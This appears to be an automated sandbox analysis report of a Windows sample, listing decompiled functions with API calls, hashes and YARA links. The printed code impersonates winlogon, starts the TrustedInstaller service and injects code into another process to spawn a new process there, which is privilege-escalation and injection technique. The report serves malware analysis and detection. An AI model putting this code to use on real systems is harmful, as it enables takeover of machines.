SeImpersonatePrivilege, xrefs: 00401FB4

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

GetProcessTimes, xrefs: 00409570
kernel32.dll, xrefs: 00409561

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}

0x004054bc
0x004054c4
0x004054cd
0x004054cf
0x004054d2
0x004054d5
0x004054d8
0x004054db
0x004054de

APIs

free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}

0x004055d1
0x004055d1
0x004055d5
0x004055da
0x004055df
0x004055e3
0x004055e4
0x004055e8
0x004055eb

APIs

free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

D, xrefs: 0040A528
GetLastError, xrefs: 0040A4FE
CreateProcessW, xrefs: 0040A4DD
kernel32.dll, xrefs: 0040A4BB

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
